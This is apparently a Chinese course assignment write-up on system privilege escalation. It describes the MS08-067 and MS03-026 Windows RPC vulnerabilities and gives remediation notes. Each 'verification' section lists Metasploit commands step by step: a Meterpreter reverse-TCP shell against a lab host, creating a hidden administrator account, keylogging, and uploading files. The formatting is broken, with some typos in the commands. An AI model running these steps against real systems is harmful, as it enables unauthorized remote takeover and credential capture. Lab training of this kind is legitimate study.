《系统提权》作业
课程名称:《系统提权》 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【要求】
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
二、测试工具
三、被测设备信息情况 1.基本信息
2.端口开放情况
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞名称】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08_067 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞描述】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 发布日期:2008/10/22 下载大小:因操作系统而异 说明:微软安全公告KB958644 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 发布日期:2008/10/22 下载大小:因操作系统而异。 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Microsoft 更新程序来保护计算机不受侵害。安装后,可能必须重新启动计算机。 严重等级:Windows 2000;XP;Server 2003为严重,Windows Vista;Server 2008;7 Beta为重要
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【解决措施】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08-067漏洞的终端用户解决方案 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞验证】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
指令:mafconsole
指令:search ms08_067 3使用ma08_067_netapi 指令:use exploit/windows/smb/ms08_067_netapi
4.查看攻击载荷 指令:Show payloads
5. 设置windows/meterpreter/reverse_tcp载荷 指令: set payload windows/meterpreter/reverse_tcp
6.查看需要配置的参数 指令: show options
7.设置参数 Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称 指令: set lhost 10.10.10.130 set rhost 10.10.10.131 set target 3
8.发动攻击 指令:exploit
9.进入shell创建用户 指令:shell net user hgc 123 /add
10.设置为超级用户 指令: net localgroup administrators hgc /add
11.对目标主机屏幕截取
指令: keysscan_start keyscan_dump keyscan_stop
13.创建文件 指令:mkdir hgc
|
【漏洞名称】 |
MS03_026 |
【漏洞描述】 |
1、Remote Procedure Call (RPC)是Windows 操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行程序的无缝地在远程系统上执行代码。协议本身源自开放软件基 金会的RPC协议,Microsoft在其基础上增加了自己的一些扩展。
eEye的研究人员发现,由于Windows RPC DCOM接口对报文的长度域缺乏检查导致发生基于堆的溢出,远程***者可以利用这些漏洞以本地系统权限在系统上执行任意指令。
漏洞实质上影响的是使用RPC的DCOM接口,此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。***者通过向目标发送畸形 RPC DCOM请求来利用这些漏洞。成功利用此漏洞可以以本地系统权限执行任意指令。***者可以在系统上执行任意操作 ,如安装程序、查看或更改、删除数据或创建系统管理员权限的帐户。
使用者可以通过 135(UDP/TCP)、137/UDP、138/UDP、139/TCP、445(UDP/TCP)、593/TCP端口进行攻击。对于启动了COM Internet服务和RPC over HTTP的用户来说,还可能通过80/TCP和443/TCP端口进行***。 2、Microsoft DCOM RPC相关系统漏洞,具体内容即为MS03-026和MS03-039.正因为此,造成Blaster.Worm(冲击波).以及 w32.Nachi.Worm(冲击波杀手)蠕虫病毒在校园网络中的泛滥.而且DCOM RPC漏洞的remote root ,可以让一个不具备任何基础知识的攻击者,在2分钟之内进入到你的计算机系统中,他所做的仅仅是从网上下载一个简单的攻击工具和一个扫描工具就可以了. 查找ms03-026系统漏洞的利用: msf>search ms03_026 显示找到的ms03-026的路径 msf>use exploit/windows/.../ms03_026_dcom
进入后可以输入 msf exploit(ms03_026_dcom) > show options 来查看所需要输入的参数
msf exploit(ms03_026_dcom) > show payloads 显示当前模块的所有攻击载荷。攻击载荷是我们希望在目标系统被渗透后去执行的代码。 msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp 选择一个反弹式的shell
msf exploit(ms03_026_dcom) > set RHOST 192.168.250.157 msf exploit(ms03_026_dcom) > set LHOST 192.168.250.135 输入靶机地址和攻击机的地址
msf exploit(ms03_026_dcom) > exploit 开始进行渗透攻击 |
【解决措施】 |
解决方法:首先,打开“管理工具”→“服务”管理器,在服务管理器的主窗口服务列表中,找到名称为“Cryptographic Services”的服务项,双击该服务项,在弹出的该服务项属性对话框中,单击“停止”按钮,停止该服务。然后,在资源管理器中,打开系统安装目录\\System32\\文件夹,在该文件夹下,找到名为“catroot2”的文件夹,将其删除或重命名。最后在服务管理器中,将“Cryptographic Services”服务启动,并安装系统漏洞补丁,一般就可以正常安装系统补丁了 |
【漏洞验证】 |
指令:msfconsole
指令search MS03_026
3.执行该文件 指令: use exploit/windows/dcerpc/ms03_026_dcom
4.查看攻击载荷 指令:show payload 5.设置攻击载荷 指令: set payload windows/meterpreter/reverse_tcp
6.查看需要设置的参数 指令: show options 7.设置参数 Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称 指令: set lhost 10.10.10.130 set rhost 10.10.10.131 set target 0
8.开始运行
指令: net user hgc2 123 /add
指令: net localgroup administrators hgc2 /add
11.远程桌面登录
成功连接远程主机
新建文件夹
返回虚拟机查看 可以看到文件夹成功出现,这表明系统管理员账户创建成功,远程主机连接成功
12.上传文件 指令:upload /root/user.txt 返回windows 2003查看
|
教程下载地址:https://download.csdn.net/download/qq_38162763/10594297
本次教程结束